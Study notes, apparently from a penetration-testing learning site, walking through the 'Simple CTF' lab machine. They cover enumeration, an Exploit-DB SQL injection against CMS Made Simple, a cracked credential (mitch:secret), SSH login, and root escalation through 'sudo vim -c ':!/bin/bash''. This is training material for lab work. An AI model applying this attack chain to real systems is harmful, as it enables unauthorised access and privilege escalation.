Search

Home

PNPT Studies

PJPT Studies

AD CS / Certificate Attacks (ESC1-15) (1, 8, 11 for now)

Report Writing / Client Presentation

Operationalizing Cybercrime Data (June 2025)

Simple CTF (Challenge Machine)

Resources for this video:

dirsearch - https://github.com/maurosoria/dirsearch

Exploit-DB for Simple CMS - https://www.exploit-db.com/exploits/46635

Not FTP, not normal SSH, nothing directly under the first page

dirbuster?

/simple/ contains CMS Made Simple

Google:

has exploit. Exploit gives us a user and hash. Find has password:

CMS Made Simple < 2.2.10 - SQL Injection - PHP webapps Exploit (exploit-db.com) MD5 hash for « 0c01f4468bd75d7a84c7eb73846e8d96 » (gromweb.com)

secret

account:

mitch:secret

connect to SSH on port 2222:

ssh -p 2222 mitch@10.10.14.50

User Enum:

whoami
sudo -l

We have sudo for VIM

GTFOBins:

sudo vim -c ':!/bin/bash'

find both files and cat them out:

locate user.txt

locate root.txt